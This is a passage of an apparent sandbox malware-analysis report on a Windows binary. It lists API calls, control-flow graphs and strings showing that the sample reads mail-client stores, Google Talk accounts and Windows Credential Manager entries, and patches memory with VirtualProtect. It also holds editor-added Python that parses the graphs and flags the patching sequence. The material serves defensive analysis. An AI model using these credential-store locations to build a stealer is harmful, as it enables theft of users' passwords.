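    "246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 "
    "247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 "
    "249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 "
    "251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit "
    "252->258 258->257"
)

if __name__ == "__main__":
    nodes, edges = parse_cfg(SAMPLE_GRAPH_40FB00)
    print(len(nodes), "blocks,", len(edges), "edges, exit blocks:", exit_blocks(nodes, edges))
    print("API call sites:", dict(api_histogram(nodes)))
    print("blocks calling RegCloseKey:", blocks_calling(nodes, "RegCloseKey"))
    print("all blocks reachable from 262:", reachable(edges, 262) == set(nodes))
```

For the 0040FB00 graph this reports eleven blocks with one exit (265), two RegOpenKeyExA sites, two RegCloseKey sites and the doubled memcpy in block 278, which matches the API list above; the same parser handles the CRT entry graph (44b49f) earlier on the page, where it counts the two _initterm calls in block 243.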

                                                                                                                                                                                    Control-flow Graph

APIs
• memset.MSVCRT ref: 0044430B
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
• memset.MSVCRT ref: 00444379
• memset.MSVCRT ref: 00444394
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
• strlen.MSVCRT ref: 004443DB
• _strcmpi.MSVCRT ref: 00444401
Strings
• Store Root, xrefs: 004443A5
• \Microsoft\Windows Live Mail, xrefs: 00444350
• Software\Microsoft\Windows Live Mail, xrefs: 004443AA
• \Microsoft\Windows Mail, xrefs: 00444329
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
• String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
• API String ID: 832325562-2578778931
• Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
• Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
• Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
• Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

APIs
• memset.MSVCRT ref: 0040F567
• memset.MSVCRT ref: 0040F57F
  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
• RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
• LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
• String ID:
• API String ID: 2012582556-3916222277
• Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
• Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
• Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
• Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

APIs
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
• wcslen.MSVCRT ref: 0040874A
• wcsncmp.MSVCRT ref: 00408794
• memset.MSVCRT ref: 0040882A
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
• wcschr.MSVCRT ref: 0040889F
• LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
• LocalFree.KERNELBASE(?), ref: 004088F3
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressProc$FreeLocal$LibraryLoadmemcpymemsetwcschrwcslenwcsncmp
• String ID: J$Microsoft_WinInet
• API String ID: 3950215071-260894208
• Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
• Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
• Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
• Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A

APIs
• memset.MSVCRT ref: 004037EB
• memset.MSVCRT ref: 004037FF
  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
• strchr.MSVCRT ref: 0040386E
• _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
• strlen.MSVCRT ref: 00403897
• sprintf.MSVCRT ref: 004038B7
• _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
• String ID: %s@yahoo.com
• API String ID: 317221925-3288273942
• Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
• Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
• Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
• Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

APIs
• memset.MSVCRT ref: 00403504
• memset.MSVCRT ref: 0040351A
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 0040356D
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _mbscatmemset$Close_mbscpystrlen
• String ID: InstallPath$Software\Group Mail$fb.dat
• API String ID: 3071782539-966475738
• Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
• Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
• Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
• Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

Control-flow Graph

control_flow_graph 390 40ccd7-40cd06 ??2@YAPAXI@Z 391 40cd08-40cd0d 390->391 392 40cd0f 390->392 393 40cd11-40cd24 ??2@YAPAXI@Z 391->393 392->393 394 40cd26-40cd2d call 404025 393->394 395 40cd2f 393->395 396 40cd31-40cd57 394->396 395->396 399 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 396->399 400 40cd59-40cd60 DeleteObject 396->400 400->399
APIs
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
• ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
• DeleteObject.GDI32(?), ref: 0040CD5A
• memset.MSVCRT ref: 0040CD96
• LoadIconA.USER32(00000065), ref: 0040CDA6
• _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ??2@$DeleteIconLoadObject_mbscpymemset
• String ID:
• API String ID: 2054149589-0
• Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
• Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
• Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
• Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

Control-flow Graph

control_flow_graph 407 44b40e-44b415 GetModuleHandleA 408 44b455 407->408 409 44b417-44b426 call 44b42b 407->409 411 44b457-44b45b 408->411 418 44b48d 409->418 419 44b428-44b433 GetProcAddress 409->419 413 44b45d-44b465 GetModuleHandleA 411->413 414 44b49a call 44b49f 411->414 417 44b467-44b46f 413->417 417->417 420 44b471-44b474 417->420 422 44b48e-44b496 418->422 419->408 423 44b435-44b442 VirtualProtect 419->423 420->411 421 44b476-44b478 420->421 424 44b47e-44b486 421->424 425 44b47a-44b47c 421->425 431 44b498 422->431 427 44b454 423->427 428 44b444-44b452 VirtualProtect 423->428 429 44b487-44b488 GetProcAddress 424->429 425->429 427->408 428->427 429->418 431->420
APIs
• GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
• GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
  • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
  • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
  • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

Control-flow Graph

APIs
  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
• memset.MSVCRT ref: 00408620
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• memset.MSVCRT ref: 00408671
• RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
• RegCloseKey.ADVAPI32(?), ref: 004086D6
Strings
• Software\Google\Google Talk\Accounts, xrefs: 004085F1
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 1366857005-1079885057
• Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
• Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
• Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
• Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

Control-flow Graph

control_flow_graph 455 40ba28-40ba3a 456 40ba87-40ba9b call 406c62 455->456 457 40ba3c-40ba52 call 407e20 _mbsicmp 455->457 479 40ba9d call 4107f1 456->479 480 40ba9d call 404734 456->480 481 40ba9d call 404785 456->481 482 40ba9d call 403c16 456->482 483 40ba9d call 410a9c 456->483 462 40ba54-40ba6d call 407e20 457->462 463 40ba7b-40ba85 457->463 468 40ba74 462->468 469 40ba6f-40ba72 462->469 463->456 463->457 464 40baa0-40bab3 call 407e30 472 40bab5-40bac1 464->472 473 40bafa-40bb09 SetCursor 464->473 471 40ba75-40ba76 call 40b5e5 468->471 469->471 471->463 475 40bac3-40bace 472->475 476 40bad8-40baf7 qsort 472->476 475->476 476->473 479->464 480->464 481->464 482->464 483->464
APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Cursor_mbsicmpqsort
• String ID: /nosort$/sort
• API String ID: 882979914-1578091866
• Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
• Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
• Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
• Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
APIs
• GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
  • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
  • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
  • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
  • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
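The function at 0044B40E resolves an export with GetProcAddress, calls VirtualProtect with dwSize 00000078 and flNewProtect 00000004 (PAGE_READWRITE), then calls VirtualProtect a second time on the same size to put the previous protection back. That call order is the shape of an in-memory patch of something the code has just located, and it is worth extracting from a report mechanically rather than by eye. The Python below is an editor-added example, not code from Joe Sandbox or from the analysed sample: it parses API reference lines in the report's "API.MODULE(args), ref: ADDR" form and flags that resolve/make-writable/restore sequence. The constructed input is the set of lines listed for 0044B40E above; the six-call search window is an assumed tuning value, not something the report states.

```python
"""Flag "resolve export, make it writable, restore protection" call sequences in
Joe Sandbox API reference lines.  Editor-added example; not code from the
report or from the analysed sample.  SAMPLE_LINES is copied from the function
at 0044B40E in the report; the search window size is an assumed tuning value."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# PAGE_* constants from winnt.h; any of these lets the caller write the region.
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
WRITABLE_PROTECTIONS = {PAGE_READWRITE, PAGE_WRITECOPY,
                        PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# One report line: optional "Part of subcall function XXXXXXXX:" prefix, then
# API.MODULE, an optional "(arg,arg,...)" list, then "ref: XXXXXXXX".
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w?@]+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw tokens as printed: 8-digit hex, "?" or a string
    ref: str                   # address of the call site
    subcall: Optional[str] = None


def parse_calls(text: str) -> List[ApiCall]:
    """Parse every API reference line in `text`; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def arg_int(arg: str) -> Optional[int]:
    """Convert an 8-digit hex argument; '?' (unknown) and string arguments give None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def find_resolve_and_patch(calls: List[ApiCall], window: int = 6) -> List[Dict]:
    """One finding per GetProcAddress that is followed, within `window` calls, by
    VirtualProtect(..., size, <writable protection>, ...) and then a second
    VirtualProtect on the same size (the restore of the old protection)."""
    findings = []
    for i, call in enumerate(calls):
        if call.api != "GetProcAddress":
            continue
        patch = restore = None
        for later in calls[i + 1:i + 1 + window]:
            if later.api != "VirtualProtect" or len(later.args) < 3:
                continue
            if patch is None:
                if arg_int(later.args[2]) in WRITABLE_PROTECTIONS:
                    patch = later
            else:
                restore = later
                break
        if patch and restore and arg_int(patch.args[1]) == arg_int(restore.args[1]):
            findings.append({
                "resolve_ref": call.ref,
                "patch_ref": patch.ref,
                "restore_ref": restore.ref,
                "size": arg_int(patch.args[1]),
                "protection": arg_int(patch.args[2]),
            })
    return findings


# Constructed input: the API lines the report lists for function 0044B40E.
SAMPLE_LINES = """\
• GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
• VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
• VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
• GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
"""

if __name__ == "__main__":
    for f in find_resolve_and_patch(parse_calls(SAMPLE_LINES)):
        print("GetProcAddress at %s: %#x bytes set to protection %#x at %s, restored at %s"
              % (f["resolve_ref"], f["size"], f["protection"], f["patch_ref"], f["restore_ref"]))
```

The first argument of both VirtualProtect calls is unknown in the report ("?"), so the detector keys on the protection value and the matching size rather than on the address; the second GetProcAddress at 0044B488 produces no finding because no VirtualProtect follows it.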

APIs
  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,761F0A60,?,00000000), ref: 00410D1C
  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
• memset.MSVCRT ref: 00410E10
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
• _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 889583718-2036018995
• Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
• Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
• Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
• Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

APIs
• FindResourceA.KERNEL32(?,?,?), ref: 00410C75
• SizeofResource.KERNEL32(?,00000000), ref: 00410C86
• LoadResource.KERNEL32(?,00000000), ref: 00410C96
• LockResource.KERNEL32(00000000), ref: 00410CA1
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
• Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
• Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
• Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8

APIs
• memset.MSVCRT ref: 004109F7
  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
• WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
• memset.MSVCRT ref: 00410A32
• GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: PrivateProfileStringmemset$Writememcpysprintf
• String ID:
• API String ID: 3143880245-0
• Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
• Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
• Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
• Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
